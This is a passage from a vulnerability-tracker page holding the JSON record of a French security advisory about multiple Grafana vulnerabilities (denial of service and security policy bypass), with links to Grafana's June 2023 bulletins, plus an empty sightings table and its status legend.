{
"description": "Version initiale",
"revision_date": "2023-06-29T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans Grafana. Elles\npermettent \u00e0 un attaquant de provoquer un contournement de la politique\nde s\u00e9curit\u00e9 et un d\u00e9ni de service \u00e0 distance.\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans Grafana",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Grafana du 06 juin 2023",
"url": "https://grafana.com/blog/2023/06/06/grafana-security-release-new-grafana-versions-with-security-fixes-for-cve-2023-2183-and-cve-2023-2801/"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Grafana du 22 juin 2023",
"url": "https://grafana.com/blog/2023/06/22/grafana-security-release-for-cve-2023-3128/"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…